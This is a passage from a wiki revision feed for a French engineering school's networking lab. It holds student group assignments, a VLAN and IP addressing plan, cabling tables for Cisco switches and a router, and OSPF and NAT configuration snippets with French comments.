| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.0.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage NAT ===&lt;br /&gt;
&lt;br /&gt;
L'objectif du NAT est de faire la translation ip_privee&amp;lt;-&amp;gt;ip_publique entre les VM et l'extérieur&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
[A COMPLETER]&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    ip nat inside source static local-ip global-ip&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat inside&lt;br /&gt;
    exit&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat outside&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53000</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53000"/>
				<updated>2020-11-02T14:17:07Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Plan d'adressage==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 314&lt;br /&gt;
| 193.48.57.176&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| 312&lt;br /&gt;
| 193.48.57.177&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 311&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 310&lt;br /&gt;
| 193.48.57.179&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 309&lt;br /&gt;
| 193.48.57.180&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 308&lt;br /&gt;
| 193.48.57.181&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 307&lt;br /&gt;
| 193.48.57.182&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 306&lt;br /&gt;
| 193.48.57.183&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 305&lt;br /&gt;
| 193.48.57.184&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 304&lt;br /&gt;
| 193.48.57.185&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 303&lt;br /&gt;
| 193.48.57.186&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 302&lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 1&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| 10.60.100.1&lt;br /&gt;
| 10.60.100.2&lt;br /&gt;
| 10.60.100.254&lt;br /&gt;
| 2001:660:4401:60b0::0/64&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.8/29&lt;br /&gt;
| 192.168.222.12&lt;br /&gt;
| 192.168.222.13&lt;br /&gt;
| 192.168.222.&lt;br /&gt;
| 2001:660:4401:60b1::0/64&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.0/24&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 100.64.0.3&lt;br /&gt;
| 2001:660:4401:60b2::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| 301&lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 10.60.101.1&lt;br /&gt;
| 10.60.101.2&lt;br /&gt;
| 10.60.101.254&lt;br /&gt;
| 2001:660:4401:60b3::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| &lt;br /&gt;
| 302&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 10.60.102.1&lt;br /&gt;
| 10.60.102.2&lt;br /&gt;
| 10.60.102.254&lt;br /&gt;
| 2001:660:4401:60b4::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| &lt;br /&gt;
| 303&lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 10.60.103.1&lt;br /&gt;
| 10.60.103.2&lt;br /&gt;
| 10.60.103.254&lt;br /&gt;
| 2001:660:4401:60b5::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| &lt;br /&gt;
| 304&lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 10.60.104.1&lt;br /&gt;
| 10.60.104.2&lt;br /&gt;
| 10.60.104.254&lt;br /&gt;
| 2001:660:4401:60b6::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| &lt;br /&gt;
| 305&lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 10.60.105.1&lt;br /&gt;
| 10.60.105.2&lt;br /&gt;
| 10.60.105.254&lt;br /&gt;
| 2001:660:4401:60b7::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| &lt;br /&gt;
| 306&lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 10.60.106.1&lt;br /&gt;
| 10.60.106.2&lt;br /&gt;
| 10.60.106.254&lt;br /&gt;
| 2001:660:4401:60b8::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| &lt;br /&gt;
| 307&lt;br /&gt;
| 10.60.107.0/24&lt;br /&gt;
| 10.60.107.1&lt;br /&gt;
| 10.60.107.2&lt;br /&gt;
| 10.60.107.254&lt;br /&gt;
| 2001:660:4401:60b9::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| &lt;br /&gt;
| 308&lt;br /&gt;
| 10.60.108.0/24&lt;br /&gt;
| 10.60.108.1&lt;br /&gt;
| 10.60.108.2&lt;br /&gt;
| 10.60.108.254&lt;br /&gt;
| 2001:660:4401:60ba::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| &lt;br /&gt;
| 309&lt;br /&gt;
| 10.60.109.0/24&lt;br /&gt;
| 10.60.109.1&lt;br /&gt;
| 10.60.109.2&lt;br /&gt;
| 10.60.109.254&lt;br /&gt;
| 2001:660:4401:60bb::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| &lt;br /&gt;
| 310&lt;br /&gt;
| 10.60.110.0/24&lt;br /&gt;
| 10.60.110.1&lt;br /&gt;
| 10.60.110.2&lt;br /&gt;
| 10.60.110.254&lt;br /&gt;
| 2001:660:4401:60bc::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| &lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| &lt;br /&gt;
| 312&lt;br /&gt;
| 10.60.112.0/24&lt;br /&gt;
| 10.60.112.1&lt;br /&gt;
| 10.60.112.2&lt;br /&gt;
| 10.60.112.254&lt;br /&gt;
| 2001:660:4401:60be::0/64&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| 314&lt;br /&gt;
| 10.60.114.0/24&lt;br /&gt;
| 10.60.114.1&lt;br /&gt;
| 10.60.114.2&lt;br /&gt;
| 10.60.114.254&lt;br /&gt;
| 2001:660:4401:60bf::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.1/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.2/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.0.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage NAT ===&lt;br /&gt;
&lt;br /&gt;
L'objectif du NAT est de faire la translation ip_privee&amp;lt;-&amp;gt;ip_publique entre les VM et l'extérieur&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
[A COMPLETER]&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    ip nat inside source static local-ip global-ip&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat inside&lt;br /&gt;
    exit&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat outside&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52741</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52741"/>
				<updated>2020-10-15T09:04:46Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Paramétrage de l'OSPF */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.5/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.6/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
